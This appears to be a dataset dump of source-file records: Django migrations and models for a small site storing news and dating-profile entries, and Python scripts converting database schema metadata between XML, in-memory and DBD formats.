"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 10:39\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0002_news_userinfo'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='jobbole_date',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('custom_description', models.CharField(max_length=200, verbose_name='自我描述')),\n ('detail_info_url', models.CharField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('publish_time', models.CharField(max_length=45, verbose_name='发布时间')),\n ('location', models.CharField(max_length=45, verbose_name='地址')),\n ('fav_num', models.IntegerField(default=0)),\n ],\n options={\n 'verbose_name': '相亲信息',\n 'verbose_name_plural': '相亲信息',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6848306059837341,
"alphanum_fraction": 0.6966126561164856,
"avg_line_length": 36.72222137451172,
"blob_id": "9c2f8af993de719397624ee18206eb59ddee0008",
"content_id": "b2dc3d9e71936b2667616c4bed6d61ed95531226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 18,
"path": "/apps/users/models.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom datetime import datetime\n\n# Create your models here.\nclass UserInfo(AbstractUser):\n nick_name = models.CharField(max_length=50, verbose_name=u\"昵称\", default=\"\")\n mobile = models.CharField(max_length=11, verbose_name=u\"手机号码\")\n avatar = models.ImageField(upload_to=\"avatar/%Y/%m\", default=\"avatar/default.png\", max_length=100)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=u\"添加时间\")\n\n class Meta:\n verbose_name = u\"用户信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.username\n"
},
{
"alpha_fraction": 0.3472222089767456,
"alphanum_fraction": 0.5,
"avg_line_length": 23.33333396911621,
"blob_id": "fabce21acb43e9b7e3f9afcdb4547893e7b0656c",
"content_id": "765282fc5bb3a43d9db362c0cec987d6c349ec75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/apps/__init__.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n__author__ = 'Gh'\n__date__ = '2017/5/25 下午3:51'"
},
{
"alpha_fraction": 0.5359342694282532,
"alphanum_fraction": 0.5564681887626648,
"avg_line_length": 30.419355392456055,
"blob_id": "db48d051da1a3c38e1db9e8fd8430eba074f3b80",
"content_id": "39d1cdb6fa630d22d52f8ab695105c2a774f5501",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 31,
"path": "/apps/gApi/migrations/0001_initial.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-25 07:46\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='News',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=200, verbose_name='标题')),\n ('summary', models.TextField(verbose_name='摘要')),\n ('thumbnail', models.ImageField(upload_to='thumbnail/%Y/%m', verbose_name='缩略图')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='添加时间')),\n ],\n options={\n 'verbose_name': '新闻',\n 'verbose_name_plural': '新闻',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5232142806053162,
"alphanum_fraction": 0.5523809790611267,
"avg_line_length": 39,
"blob_id": "cd724581a97567dab8176393416699f321e89716",
"content_id": "eb5447a46143c95bfb692f2f865fd4329c952ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 42,
"path": "/apps/gApi/migrations/0005_jobbole_detail_data_jobbole_image_data.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0004_auto_20170609_1136'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='jobbole_detail_data',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('detail_description_content', models.TextField(verbose_name='详细的自我描述')),\n ('detail_info_url', models.URLField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('images_url_datas', models.CharField(max_length=300, verbose_name='妹子发的图片集')),\n ],\n options={\n 'verbose_name': '相亲详细信息',\n 'verbose_name_plural': '相亲详细信息',\n },\n ),\n migrations.CreateModel(\n name='jobbole_image_data',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('detail_info_url', models.URLField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('image_url', models.CharField(max_length=300, verbose_name='妹子发的单张图片')),\n ],\n options={\n 'verbose_name': '相亲图片信息',\n 'verbose_name_plural': '相亲图片信息',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5399284958839417,
"alphanum_fraction": 0.5721096396446228,
"avg_line_length": 26.96666717529297,
"blob_id": "851bfa2be99cc39288dbc1eb6dd218a095beb437",
"content_id": "5bf32c3c94be4e6c23260bb2dac12ff4d4c18114",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 30,
"path": "/apps/gApi/migrations/0004_auto_20170609_1136.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 11:36\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0003_jobbole_date'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='jobbole_date',\n name='detail_info_url',\n field=models.URLField(max_length=300, verbose_name='详情链接'),\n ),\n migrations.AlterField(\n model_name='jobbole_date',\n name='fav_num',\n field=models.IntegerField(default=0, verbose_name='喜欢数'),\n ),\n migrations.AlterField(\n model_name='jobbole_date',\n name='location',\n field=models.CharField(max_length=45, verbose_name='发布地址'),\n ),\n ]\n"
}
] | 14 |
StavC/LinearRegressionCarPrices
|
https://github.com/StavC/LinearRegressionCarPrices
|
a31ef92abd931c94c3093be963751ba96805b87e
|
329915c948262812552893b3c30abfe34d3928bb
|
3f1696ee37880a2a94e1dc8d93788021c1ecea7a
|
refs/heads/master
| 2020-07-28T19:15:55.536845 | 2019-09-19T11:59:50 | 2019-09-19T11:59:50 | 209,507,545 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.668838620185852,
"alphanum_fraction": 0.681077778339386,
"avg_line_length": 47.12711715698242,
"blob_id": "29bd95a25a54989431daa09b4e9f35c83f756642",
"content_id": "ef5f0664289ca3ca2cdeb798cb9aa8d5a8ee7ca7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11357,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 236,
"path": "/LinerRegerssionCarPrices.py",
"repo_name": "StavC/LinearRegressionCarPrices",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nimport seaborn as sns\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\ndef main():\n sns.set()\n raw_data=pd.read_csv('1.04. Real-life example.csv')\n pd.set_option('display.expand_frame_repr', False)\n print(raw_data.describe(include='all'))\n ## it will be hard to implement model that has 312 unique models so will drop it\n data=raw_data.drop(['Model'],axis=1)\n #print(data.describe(include='all'))\n #print(data.isnull().sum())\n #price and Enginev has null so drop the null entrys\n data_no_missing_values=data.dropna(axis=0) #drop all the entrys with missing values\n #print(data_no_missing_values.describe(include='all'))\n #sns.distplot(data_no_missing_values['Price'])\n #plt.show()\n # we can see we have strong outliners in the graph and in the describe the max value is 300000 far from the mean 19552\n # we can drop the 0.99% of high prices to get rid of the outliners\n q=data_no_missing_values['Price'].quantile(0.99)\n data_1=data_no_missing_values[data_no_missing_values['Price']<q]\n # getting all the entrys that are less than 99% of the max price\n #print(data_1.describe(include='all'))\n # the max is closer to the mean now lets plot the data\n #sns.distplot(data_1['Price'])\n #plt.show()\n #less outliners\n #deal with the mileage the same way\n q=data_1['Mileage'].quantile(0.99)\n data_2=data_1[data_1['Mileage']<q]\n #sns.distplot(data_2['Mileage'])\n #plt.show()\n data_3=data_2[data_2['EngineV']<6.5] #EngineV cant be above 6.5 from google\n #year has outliners in the low precent so get rid of them\n q=data_3['Year'].quantile(0.01)\n data_4=data_3[data_3['Year']>q]\n #sns.distplot(data_4['Year'])\n #plt.show()\n data_cleaned=data_4.reset_index(drop=True)\n print(data_cleaned.describe(include='all'))\n\n # f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True, figsize=(15, 3)) # sharey -> share 'Price' as y\n #ax1.scatter(data_cleaned['Year'], data_cleaned['Price'])\n # ax1.set_title('Price and Year')\n #ax2.scatter(data_cleaned['EngineV'], data_cleaned['Price'])\n #ax2.set_title('Price and EngineV')\n #ax3.scatter(data_cleaned['Mileage'], data_cleaned['Price'])\n #ax3.set_title('Price and Mileage')\n\n #plt.show()\n # From the subplots and the PDF of price, we can easily determine that 'Price' is exponentially distributed\n # A good transformation in that case is a log transformation\n #sns.distplot(data_cleaned['Price'])\n # Let's transform 'Price' with a log transformation\n log_price = np.log(data_cleaned['Price'])\n\n # Then we add it to our data frame\n data_cleaned['log_price'] = log_price\n\n # f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True, figsize=(15, 3))\n # ax1.scatter(data_cleaned['Year'], data_cleaned['log_price'])\n #ax1.set_title('Log Price and Year')\n #ax2.scatter(data_cleaned['EngineV'], data_cleaned['log_price'])\n #ax2.set_title('Log Price and EngineV')\n #ax3.scatter(data_cleaned['Mileage'], data_cleaned['log_price'])\n #ax3.set_title('Log Price and Mileage')\n # The relationships show a clear linear relationship\n # This is some good linear regression material\n # Alternatively we could have transformed each of the independent variables\n #plt.show()\n\n ###### check for multicollinearity\n # To make this as easy as possible to use, we declare a variable where we put\n # all features where we want to check for multicollinearity\n variables = data_cleaned[['Mileage', 'Year', 'EngineV']]\n vif = pd.DataFrame()\n # here we make use of the variance_inflation_factor, which will basically output the respective VIFs\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n # Finally, I like to include names so it is easier to explore the result\n vif[\"Features\"] = variables.columns\n #print(vif)\n # Since Year has the highest VIF, remove it from the model\n # This will drive the VIF of other variables down!!!\n # So even if EngineV seems with a high VIF, too, once 'Year' is gone that will no longer be the case\n data_no_multicollinearity = data_cleaned.drop(['Year'], axis=1)\n variables = data_no_multicollinearity[['Mileage', 'EngineV']]\n vif = pd.DataFrame()\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n vif[\"Features\"] = variables.columns\n #print(vif)\n # the VIF is low for Mileage and EngineV\n\n #### create Dummy Variables\n data_with_dummys=pd.get_dummies(data_no_multicollinearity,drop_first=True)\n #print(data_with_dummys.head())\n # To make the code a bit more parametrized, let's declare a new variable that will contain the preferred order\n\n cols = ['log_price', 'Mileage', 'EngineV', 'Brand_BMW',\n 'Brand_Mercedes-Benz', 'Brand_Mitsubishi', 'Brand_Renault',\n 'Brand_Toyota', 'Brand_Volkswagen', 'Body_hatch', 'Body_other',\n 'Body_sedan', 'Body_vagon', 'Body_van', 'Engine Type_Gas',\n 'Engine Type_Other', 'Engine Type_Petrol', 'Registration_yes']\n data_preprocessed = data_with_dummys[cols]\n\n ### geting VIF for all features\n # Let's simply drop log_price from data_preprocessed\n variables = data_preprocessed.drop(['log_price'], axis=1)\n vif = pd.DataFrame()\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n vif[\"features\"] = variables.columns\n #print(vif)\n\n\n ###### Linear Regerssion Model\n # The target(s) (dependent variable) is 'log price'\n targets = data_preprocessed['log_price']\n\n # The inputs are everything BUT the dependent variable, so we can simply drop it\n inputs = data_preprocessed.drop(['log_price'], axis=1)\n # Create a scaler object\n scaler = StandardScaler()\n # Fit the inputs (calculate the mean and standard deviation feature-wise)\n scaler.fit(inputs)\n # Scale the features and store them in a new variable (the actual scaling procedure)\n inputs_scaled = scaler.transform(inputs)\n\n ### TRAIN TEST SPLIT\n x_train, x_test, y_train, y_test = train_test_split(inputs_scaled, targets, test_size=0.2, random_state=365)\n\n # Create a linear regression object\n reg = LinearRegression()\n # Fit the regression with the scaled TRAIN inputs and targets\n reg.fit(x_train, y_train) #X the values,Y the right log price\n # Let's check the outputs of the regression\n # I'll store them in y_hat as this is the 'theoretical' name of the predictions\n y_hat = reg.predict(x_train)\n # The simplest way to compare the targets (y_train) and the predictions (y_hat) is to plot them on a scatter plot\n # The closer the points to the 45-degree line, the better the prediction\n plt.scatter(y_train, y_hat)\n # Let's also name the axes\n plt.xlabel('Targets (y_train)', size=18)\n plt.ylabel('Predictions (y_hat)', size=18)\n # Sometimes the plot will have different scales of the x-axis and the y-axis\n # This is an issue as we won't be able to interpret the '45-degree line'\n # We want the x-axis and the y-axis to be the same\n plt.xlim(6, 13)\n plt.ylim(6, 13)\n plt.show()\n # Another useful check of our model is a residual plot\n # We can plot the PDF of the residuals and check for anomalies\n sns.distplot(y_train - y_hat)\n\n # Include a title\n plt.title(\"Residuals PDF\", size=18)\n\n # In the best case scenario this plot should be normally distributed\n # In our case we notice that there are many negative residuals (far away from the mean)\n # Given the definition of the residuals (y_train - y_hat), negative values imply\n # that y_hat (predictions) are much higher than y_train (the targets)\n # This is food for thought to improve our model\n # Find the R-squared of the model\n reg.score(x_train, y_train)\n\n # Note that this is NOT the adjusted R-squared\n # in other words... find the Adjusted R-squared to have the appropriate measure :)\n # Obtain the bias (intercept) of the regression\n print(reg.intercept_)\n # Create a regression summary where we can compare them with one-another\n reg_summary = pd.DataFrame(inputs.columns.values, columns=['Features'])\n reg_summary['Weights'] = reg.coef_\n print(reg_summary)\n # Check the different categories in the 'Brand' variable\n data_cleaned['Brand'].unique()\n # In this way we can see which 'Brand' is actually the benchmark-AUDI\n ### TESTING\n # Once we have trained and fine-tuned our model, we can proceed to testing it\n # Testing is done on a dataset that the algorithm has never seen\n # Luckily we have prepared such a dataset\n # Our test inputs are 'x_test', while the outputs: 'y_test'\n # We SHOULD NOT TRAIN THE MODEL ON THEM, we just feed them and find the predictions\n # If the predictions are far off, we will know that our model overfitted\n y_hat_test = reg.predict(x_test)\n\n # Create a scatter plot with the test targets and the test predictions\n # You can include the argument 'alpha' which will introduce opacity to the graph\n plt.scatter(y_test, y_hat_test, alpha=0.2)\n plt.xlabel('Targets (y_test)', size=18)\n plt.ylabel('Predictions (y_hat_test)', size=18)\n plt.xlim(6, 13)\n plt.ylim(6, 13)\n plt.show()\n\n #Finally, let's manually check these predictions\n # To obtain the actual prices, we take the exponential of the log_price\n df_pf = pd.DataFrame(np.exp(y_hat_test), columns=['Prediction'])\n # Therefore, to get a proper result, we must reset the index and drop the old indexing\n y_test = y_test.reset_index(drop=True)\n df_pf['Target'] = np.exp(y_test)\n\n # Additionally, we can calculate the difference between the targets and the predictions\n # Note that this is actually the residual (we already plotted the residuals)\n df_pf['Residual'] = df_pf['Target'] - df_pf['Prediction']\n\n # Since OLS is basically an algorithm which minimizes the total sum of squared errors (residuals),\n # this comparison makes a lot of sense\n # Finally, it makes sense to see how far off we are from the result percentage-wise\n # Here, we take the absolute difference in %, so we can easily order the data frame\n df_pf['Difference%'] = np.absolute(df_pf['Residual'] / df_pf['Target'] * 100)\n # Sometimes it is useful to check these outputs manually\n # To see all rows, we use the relevant pandas syntax\n pd.options.display.max_rows = 999\n # Moreover, to make the dataset clear, we can display the result with only 2 digits after the dot\n pd.set_option('display.float_format', lambda x: '%.2f' % x)\n # Finally, we sort by difference in % and manually check the model\n df_pf=df_pf.sort_values(by=['Difference%'])\n print(df_pf)\n print(f\"R2: {reg.score(x_train, y_train)}\")\n n = x_train.shape[0]\n p = x_train.shape[1]\n\n adjusted_r2 = 1 - (1 - reg.score(x_train, y_train)) * (n - 1) / (n - p - 1)\n print(f\"adjusted r2 {adjusted_r2}\")\n\nif __name__ == '__main__':\n main()"
}
] | 1 |
falcevor-study/relational-metadata-parser
|
https://github.com/falcevor-study/relational-metadata-parser
|
9b862bfd0a20295a82525677ee47415ea1709c41
|
5ae9342030f26833d4fc7506bbb999fc8ce29b24
|
d7deccc6a0164e7fb04c2615f4bc555675f9847f
|
refs/heads/master
| 2021-12-25T13:18:12.724339 | 2017-12-30T07:07:26 | 2017-12-30T07:07:26 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7044335007667542,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 21.55555534362793,
"blob_id": "7fb9adb0df88b5d587f892aa7b90c8325a425a8d",
"content_id": "6c404d554800cbbc7b58230b8a78c624d4f43d95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/convert_xml_to_dbd.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport ram_repr.ram_to_dbd as ram2dbd\nimport xml_repr.xml_to_ram as xml2ram\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: путь к файлу с XML; путь для создания DBD.')\n\nxml = sys.argv[0]\ndbd = sys.argv[1]\n\nprint('Создания RAM представления...')\nschemas = xml2ram.read(xml)\n\nprint('Создание DBD представления...')\nram2dbd.upload(schemas, dbd)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.7239709496498108,
"alphanum_fraction": 0.7336561679840088,
"avg_line_length": 26.53333282470703,
"blob_id": "36b455a8c6503ef575822279409fffd195e4f08f",
"content_id": "1759a0febdd78357b73f31f43c0417441f75196a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 15,
"path": "/create_empty_db.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport db_deploy.ddl_applying as deploy\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: название БД; путь к XML или DBD представлению.')\n\ndb_name = sys.argv[0]\nrepr_file = sys.argv[1]\n\nprint('Создание пустой БД PostgreSQL...')\ndb = deploy.DbCreationConnection('database.cfg', 'dbd_queries_sqlite.cfg')\ndb.deploy(db_name=db_name, repr_file=repr_file)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.6726303696632385,
"alphanum_fraction": 0.6738675236701965,
"avg_line_length": 34.86347961425781,
"blob_id": "660ac1e98db689a205573405ef073a0f60d9232a",
"content_id": "c264135424bef5e1873681bf280b261e0fe8ad0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12152,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 293,
"path": "/ram_repr/ram_to_xml.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\"\nМодуль, содержащий метод выгрузки объектного представления базы в RAM в файловое представление в виде XML.\n\"\"\"\n\nfrom codecs import open as _open\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom xml_repr.minidom_fixed import Document\n\n\ndef write(schema, output):\n \"\"\" Выгрузить структуру базы из RAM в XML-файл.\n\n :param schema: выгружаемая схема базы.\n :param output: путь к файлу, в который необходимо произвести выгрузку.\n :return: None\n \"\"\"\n # Инициализируется dom-документ.\n doc = Document()\n\n # Заполняется объект схемы.\n dbd_schema = _create_schema_dom(schema, doc)\n doc.appendChild(dbd_schema)\n\n # Заполнаяется непонятный тэг. Необходим для того, чтобы результаты сошлись в любом случае.\n custom_output = doc.createElement('custom')\n dbd_schema.appendChild(custom_output)\n\n # Заполняется структура доменов.\n domains_output = doc.createElement('domains')\n dbd_schema.appendChild(domains_output)\n for domain in schema.domains.values():\n domain_output = _create_domain_dom(domain, doc)\n domains_output.appendChild(domain_output)\n\n # Заполняется структура таблиц.\n tables_output = doc.createElement('tables')\n dbd_schema.appendChild(tables_output)\n for table in schema.tables.values():\n table_output = _create_table_dom(table, doc)\n\n for field in table.fields.values():\n # Заполняется структура поля.\n field_output = _create_field_dom(field, doc)\n table_output.appendChild(field_output)\n\n for constraint in table.constraints:\n # Заполняется структура ограничения.\n constraint_output = _create_constraint_dom(constraint, doc)\n table_output.appendChild(constraint_output)\n if len(constraint.details) < 2:\n continue\n for detail in constraint.details:\n # Заполняется структура деталей ограничений.\n detail_output = _create_constraint_detail_dom(detail, doc)\n constraint_output.appendChild(detail_output)\n\n # Заполняется структура индексов.\n for index in table.indexes:\n index_output = _create_index_dom(index, doc)\n table_output.appendChild(index_output)\n if len(index.details) < 2:\n continue\n for detail in index.details:\n # Заполняется структура деталей индексов.\n detail_output = _create_index_detail_dom(detail, doc)\n index_output.appendChild(detail_output)\n\n tables_output.appendChild(table_output)\n # Происходит выгрузка созданной dom-схемы в файл.\n doc.writexml(_open(output, 'w', 'utf-8'), '', ' ', '\\n', 'utf-8')\n\n\ndef _create_schema_dom(schema: Schema, doc: Document):\n \"\"\" Создать DOM-элемент Схемы, определить все его атрибуты.\n\n :param schema: Объект RAM-представления Схемы.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Схемы.\n \"\"\"\n schema_dom = doc.createElement('dbd_schema')\n if schema.fulltext_engine:\n schema_dom.setAttribute('fulltext_engine', schema.fulltext_engine)\n if schema.version:\n schema_dom.setAttribute('version', schema.version)\n if schema.name:\n schema_dom.setAttribute('name', schema.name)\n if schema.description:\n schema_dom.setAttribute('description', schema.description)\n return schema_dom\n\n\ndef _create_domain_dom(domain: Domain, doc: Document):\n \"\"\" Создать DOM-элемент Домена, определить все его атрибуты.\n\n :param domain: Объект RAM-представления Домена.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Домена.\n \"\"\"\n domain_dom = doc.createElement('domain')\n if domain.name:\n domain_dom.setAttribute('name', domain.name)\n if domain.description:\n domain_dom.setAttribute('description', domain.description)\n if domain.type:\n domain_dom.setAttribute('type', domain.type)\n if domain.align:\n domain_dom.setAttribute('align', domain.align)\n if domain.width:\n domain_dom.setAttribute('width', domain.width)\n if domain.length:\n domain_dom.setAttribute('length', domain.length)\n if domain.precision:\n domain_dom.setAttribute('precision', domain.precision)\n\n props = []\n if domain.case_sensitive:\n props.append('case_sensitive')\n if domain.show_null:\n props.append('show_null')\n if domain.show_lead_nulls:\n props.append('show_lead_nulls')\n if domain.thousands_separator:\n props.append('thousands_separator')\n if domain.summable:\n props.append('summable')\n if len(props) > 0:\n domain_dom.setAttribute('props', ', '.join(props))\n\n if domain.scale:\n domain_dom.setAttribute('scale', domain.scale)\n if domain.char_length:\n domain_dom.setAttribute('char_length', domain.char_length)\n return domain_dom\n\n\ndef _create_table_dom(table: Table, doc: Document):\n \"\"\" Создать DOM-элемент Таблицы, определить все его атрибуты.\n\n :param table: Объект RAM-представления Таблицы.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Таблицы.\n \"\"\"\n table_dom = doc.createElement('table')\n if table.name:\n table_dom.setAttribute('name', table.name)\n if table.description:\n table_dom.setAttribute('description', table.description)\n\n props = []\n if table.add:\n props.append('add')\n if table.edit:\n props.append('edit')\n if table.delete:\n props.append('delete')\n if len(props) > 0:\n table_dom.setAttribute('props', ', '.join(props))\n return table_dom\n\n\ndef _create_field_dom(field: Field, doc: Document):\n \"\"\" Создать DOM-элемент Поля, определить все его атрибуты.\n\n :param field: Объект RAM-представления Поля.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Поля.\n \"\"\"\n field_dom = doc.createElement('field')\n if field.name:\n field_dom.setAttribute('name', field.name)\n if field.rname:\n field_dom.setAttribute('rname', field.rname)\n if field.domain:\n field_dom.setAttribute('domain', field.domain)\n if field.type:\n field_dom.setAttribute('type', field.type)\n if field.description:\n field_dom.setAttribute('description', field.description)\n\n props = []\n if field.input:\n props.append('input')\n if field.edit:\n props.append('edit')\n if field.show_in_grid:\n props.append('show_in_grid')\n if field.show_in_details:\n props.append('show_in_details')\n if field.is_mean:\n props.append('is_mean')\n if field.autocalculated:\n props.append('autocalculated')\n if field.required:\n props.append('required')\n if len(props) > 0:\n field_dom.setAttribute('props', ', '.join(props))\n return field_dom\n\n\ndef _create_constraint_dom(constraint: Constraint, doc: Document):\n \"\"\" Создать DOM-элемент Ограничения, определить все его атрибуты.\n\n :param constraint: Объект RAM-представления Ограничения.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Ограничения.\n \"\"\"\n constraint_dom = doc.createElement('constraint')\n if constraint.name:\n constraint_dom.setAttribute('name', constraint.name)\n if constraint.kind:\n constraint_dom.setAttribute('kind', constraint.kind)\n if len(constraint.details) == 1:\n constraint_dom.setAttribute('items', constraint.details[0].value)\n if constraint.reference:\n constraint_dom.setAttribute('reference', constraint.reference)\n if constraint.constraint:\n constraint_dom.setAttribute('constraint', constraint.constraint)\n if constraint.expression:\n constraint_dom.setAttribute('expression', constraint.expression)\n\n props = []\n if constraint.has_value_edit:\n props.append('has_value_edit')\n if constraint.cascading_delete == False:\n props.append('cascading_delete')\n if constraint.cascading_delete == True:\n props.append('full_cascading_delete')\n if len(props) > 0:\n constraint_dom.setAttribute('props', ', '.join(props))\n return constraint_dom\n\n\ndef _create_index_dom(index: Index, doc: Document):\n \"\"\" Создать DOM-элемент Индекса, определить все его атрибуты.\n\n :param index: Объект RAM-представления Индекса.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Индекса.\n \"\"\"\n index_dom = doc.createElement('index')\n if index.name:\n index_dom.setAttribute('name', index.name)\n if len(index.details) == 1:\n index_dom.setAttribute('field', index.details[0].value)\n\n props = []\n if index.local:\n props.append('local')\n if index.kind == 'uniqueness':\n props.append('uniqueness')\n if index.kind == 'fulltext':\n props.append('fulltext')\n if len(props) > 0:\n index_dom.setAttribute('props', ', '.join(props))\n return index_dom\n\n\ndef _create_constraint_detail_dom(detail: ConstraintDetail, doc: Document):\n \"\"\" Создать DOM-элемент Детали ограничения, определить все его атрибуты.\n\n :param detail: Объект RAM-представления Детали ограничения.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Детали ограничения.\n \"\"\"\n detail_dom = doc.createElement('item')\n if detail.value:\n detail_dom.setAttribute('value', detail.value)\n return detail_dom\n\n\ndef _create_index_detail_dom(detail: IndexDetail, doc: Document):\n \"\"\" Создать DOM-элемент Детали индекса, определить все его атрибуты.\n\n :param detail: Объект RAM-представления Детали индекса.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Детали индекса.\n \"\"\"\n detail_dom = doc.createElement('item')\n if detail.value:\n detail_dom.setAttribute('value', detail.value)\n if detail.expression:\n detail_dom.setAttribute('expression', detail.expression)\n if detail.descend:\n detail_dom.setAttribute('descend', detail.descend)\n return detail_dom\n"
},
{
"alpha_fraction": 0.4672224223613739,
"alphanum_fraction": 0.47182393074035645,
"avg_line_length": 46.75796127319336,
"blob_id": "3df1740fdefb6675f1a3ec386b1207956ff2f50a",
"content_id": "7899955671f6b51013bc34f87cfa0d8023aa94d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14995,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 314,
"path": "/dbd_repr/dbd_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
